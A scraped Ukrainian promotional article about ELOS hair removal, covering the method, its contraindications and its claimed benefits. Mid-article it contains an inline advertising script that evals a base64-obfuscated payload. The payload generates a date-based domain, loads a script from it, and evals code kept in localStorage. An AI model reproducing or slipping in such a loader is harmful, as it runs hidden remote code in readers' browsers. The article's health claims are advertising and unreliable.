ELOS епіляція – безболісне видалення небажаного волосся

Видалення волосся — клопітка процедура, яка вимагає часу та засобів. Найбільш простим методом позбавлення від небажаної рослинності вважається гоління, шугаринг та віск. Однак ці способи дають нетривалий ефект, адже через деякий час з’являється щетина. Крім того, неправильне видалення рослинності з використанням цукрової пасти або воску може призвести до появи волосяного вростання, негарних плям. Найкращий варіант вирішення задачі на тривалий термін – епіляція лазером.

Принцип роботи лазерного обладнання

Лазерна епіляція основана на спеціальному апараті, який генерує концентрований світловий промінь, для впливу на меланін, що знаходиться всередині волосяних фолікул. Однак основний недолік таких пристроїв — складність розрахувати необхідну потужність. Саме тому у дівчат із чутливою шкірою часто з’являються опіки, рубці, почервоніння. Таким чином доводиться витрачати час на додаткову реабілітацію. Найбільш ефективним, безпечним та безболісним методом видалення небажаного волосся вважається ELOS епіляція в студії ЕпіЛазер. Ця методика поєднала у собі відразу дві технології. В основі роботи приладу є світлова та електрична енергія. Таким чином, фото-промені прибирають волосистість, а електротехнологія дозволяє дестабілізувати стрижень та знищити фолікул.

При дії на волосся оптичного випромінювання стрижень нагрівається, внаслідок чого відбувається його руйнування. Основна перевага полягає в тому, що на ефективність безболісної епіляції ЕЛОС не впливає меланін та пігмент. Тому маніпуляцію можна проводити навіть засмаглим людям, з видаленням навіть світлого волосся. ELOS — гарний варіант для застосування в зоні ніг, бікіні, рук, пахв, обличчя, верхньої губи, шиї, підборіддя.

Обмеження

Важливо знати про протипоказання до цієї послуги:

порфірія;декомпенсований цукровий діабет;вагітність та лактація;інфекційні хвороби у фазі загострення;онкологічні захворювання;фотодерматит;алергія на ультрафіолет;шкірні захворювання;імунодефіцит.

Так що рекомендується консультація у свого лікаря. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Переваги та особливості ELOS епіляції

У процесі проведення сеансу немає необхідності збільшувати потужність лазера, оскільки волосся руйнується внаслідок впливу світла, тобто оптичної енергії. Електричний струм застосовується, щоб повністю зруйнувати фолікул та перешкоджати його повторному зростанню.

Переваги ЕЛОС епіляції:

Швидкість проведення (наприклад, зона пахв займає 5 хвилин).Відсутність пігментних плям, опіків (сучасні процесори забезпечують автоматичний контроль силових параметрів лазерних імпульсів).Результат назавжди (за умови підтримуючих сеансів 1 раз на півроку).Можливість боротьби з сивими, знебарвленими волосками;На епіляцію не впливає наявність або відсутність засмаги;Підходить для чутливої ​​і світлої шкіри.Ефективна система охолодження (вбудована технологія заморожування контактної маніпули гарантує безболісність процесу).

Інновації в косметології та медицині сприяють удосконаленню технологій, вигаданих раніше, і епіляція не виняток. Вибираючи салон для запису на безболісну процедуру, не бійтеся нових методик, як, наприклад, ELOS. Але не забувайте про протипоказання та будьте здорові. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/elos-epilyatsiya-bezbolisne-vidalennya-nebazhanogo-volossya/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет

Добавить комментарий

scroll to top